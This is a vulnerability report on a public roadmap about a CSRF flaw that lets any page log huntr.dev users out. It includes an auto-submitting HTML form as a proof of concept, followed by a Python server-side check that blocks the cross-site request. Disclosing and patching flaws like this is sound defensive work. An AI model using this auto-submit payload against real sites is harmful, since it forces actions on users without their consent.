418sec / huntr

Public Roadmap | huntr.dev
https://huntr.dev

[ CSRF ] Force logout user(s) via logout link #2211

Open jaapmarcus opened 2 years ago

jaapmarcus commented 2 years ago
<html>
  <body>
    <script>history.pushState('', '', '/')</script>
    <form action="https://huntr.dev/auth/logout/">
      <input type="submit" value="Submit request" />
    </form>
    <script>
      document.forms[0].submit();
    </script>
  </body>
</html>

See https://huntr.dev/bounties/a7751b29-c607-42cf-899b-d498439d2770/

Might be worth patching
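A server-side admission check that would reject the submission in the PoC above (a method-less form, which browsers send as a cross-site GET) while still accepting a legitimate same-origin logout. This is an added example, not huntr's code; SITE_ORIGIN, the header and form shapes, and the session token storage are assumptions.

```python
import hmac
import secrets
from typing import Mapping, Optional, Tuple

# Assumed origin of the application (placeholder; the real deployment is not described on the page).
SITE_ORIGIN = "https://huntr.dev"


def issue_csrf_token() -> str:
    """Mint a per-session synchroniser token; store it in the session and embed it in the logout form."""
    return secrets.token_urlsafe(32)


def logout_allowed(method: str, headers: Mapping[str, str], form: Mapping[str, str],
                   session_csrf_token: Optional[str]) -> Tuple[bool, str]:
    """Decide whether a logout request may proceed. Returns (allowed, reason).

    Header names are matched case-insensitively. Each check alone would stop the
    PoC in the issue; together they also cover browsers without Fetch Metadata.
    """
    h = {k.lower(): v for k, v in headers.items()}

    # 1. A state-changing action must not be reachable via GET. The PoC's <form>
    #    has no method attribute, so the browser submits it as GET.
    if method.upper() != "POST":
        return False, "logout must be a POST"

    # 2. Fetch Metadata: browsers label cross-site form submissions explicitly.
    sfs = h.get("sec-fetch-site")
    if sfs is not None and sfs != "same-origin":
        return False, f"rejected Sec-Fetch-Site={sfs}"

    # 3. Origin is sent on cross-origin POSTs; when present it must be ours.
    origin = h.get("origin")
    if origin is not None and origin != SITE_ORIGIN:
        return False, f"rejected Origin={origin}"

    # 4. Synchroniser token: the form must carry the token held in the session,
    #    compared in constant time so the check leaks nothing about the value.
    submitted = form.get("csrf_token", "")
    if not session_csrf_token or not hmac.compare_digest(submitted, session_csrf_token):
        return False, "missing or mismatched CSRF token"

    return True, "ok"
```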